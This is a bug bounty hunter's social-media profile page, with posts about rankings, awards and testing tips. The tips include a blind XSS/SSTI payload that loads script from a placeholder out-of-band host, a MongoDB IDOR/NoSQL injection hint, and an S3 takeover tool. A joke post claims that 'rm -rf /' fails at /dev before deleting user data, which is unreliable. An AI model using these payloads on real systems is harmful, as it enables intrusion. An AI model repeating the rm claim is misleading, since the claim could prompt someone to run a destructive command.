user avatar
bsysop
@bsysop
TOP10 @bugcrowd, TOP7 P1 Warrior ๐Ÿš€ H1 AWC Champions 2024 and 2025 bugcrowd.com/bsysop ๐ŸคŸ๐Ÿป hackerone.com/bsysop
Miami, FL
Joined May 2011
  • Pinned
    user avatar
    Super happy to see our research ranking #3 in @PortSwigger Top Web Hacking Techniques of 2024! ๐Ÿš€ This one was a wild ride! Huge thanks to @_medusa_1_ & @sw33tLie for the amazing teamwork and to @Bugcrowd, who supported us! โค๏ธ What next? Keep tuned ๐Ÿ‘€๐Ÿฅท๐Ÿป #BugBounty #Hacking
    The results are in! We're proud to announce the Top ten web hacking techniques of 2024! portswigger.net/research/top-1โ€ฆ
  • user avatar
    I hope you are ready for this talk: "rm -rf /" will not delete all the Linux files, Linux will try to delete in alphabetical order, so it will reach "/dev/" first and it will fail before it can delete /home, /root, /var, etc โ˜ ๏ธ
  • user avatar
    Work hard until you get your face in a sticker at Defcon!
  • user avatar
    This Dojo is a cool way to teach/learn about vulnerabilities. ๐Ÿ”ฅ It reveals the source code, demonstrates how servers parse the information in the backend, offers some hints, and if needed... the final solution. Amazing work @yeswehack ! ๐ŸคŸ๐Ÿป ๐Ÿงต1/2 #BugBounty #BugBountyTips
  • user avatar
    You can send remote VPS requests to your local BURP using SSH. Run this in your computer connecting to your VPS ssh -R 8080:127.0.0.1:8080 root@VPS_IP -f -N And in your VPS you can run anything like curl URL -x http://127.0.0.1:8080 #BugBountyTips #BumBumTips #BugBounty
  • user avatar
    If you find some key value like "5ede5ac4a5e083053eeeda3b" its probably MongoDB ObjectID. - Change it to a non-hex value to get errors and dig deeper. - When confirmed, go for IDOR and NoSQL Injection. #BugBounty #BugBountyTips #Pentesting
  • user avatar
    2 minutes to Bypass a custom WAF??? That's disgunting @mcipekci ๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚ #BugBounty
  • user avatar
    Yay, I was awarded a $6.000 debit on @Hacker0x01! hackerone.com/bsysop #TogetherWeHitHarder Iโ€™m selling the handler ๐Ÿ‘€
  • user avatar
    Buggy Awards 2022: Community Champion๐Ÿฆพ This was absolutely amazing, Thank you @Bugcrowd, you are the best โค๏ธ๐ŸคŸ๐Ÿป Congrats to the champions ๐Ÿฅท๐Ÿป -> @ArmanSameer95 @GodfatherOrwa @mzamat123 #BugBounty #InfoSec #Bugcrowd
  • user avatar
    Add a SSTI payload to your Blind XSS payload, if you are lucky, you have a visual internal SSTI in a critical endpoint. ${{48*53}}`'";--><sCRIpt sRc=//your.oob></sCRIpt> #BugBountyTips #BugBounty
  • user avatar
    Ok, @tumblr you got me! "From hero -> to zero" โœŒ๐Ÿป
  • user avatar
    For extremely fast S3 Bucket Takeover test, an unknown tool called flumberboozle could save your time. It combine MASSDNS with automatic UPLOAD/REMOVE tests. bit.ly/2BlZo4a Test 20k permutations in 1m45s. Kudos to @fellchase for the brain!. #BugBounty #BugBountyTips
  • user avatar
    14.000 @Bugcrowd points later, it feels like I've been hunting bugs forever (and maybe it's true) ๐Ÿ˜‚ ๐ŸคŸ๐Ÿป #BugBounty
  • user avatar
    Finally, @Bugcrowd TOP19 all the time! ๐ŸคŸ๐Ÿป Thanks to all amazing friends and great ASE/Support teams I meet during this journey, you are awesome โค๏ธ! Learn with your mistakes, accept them and improve every day! ๐Ÿ’ช๐Ÿป #BugBounty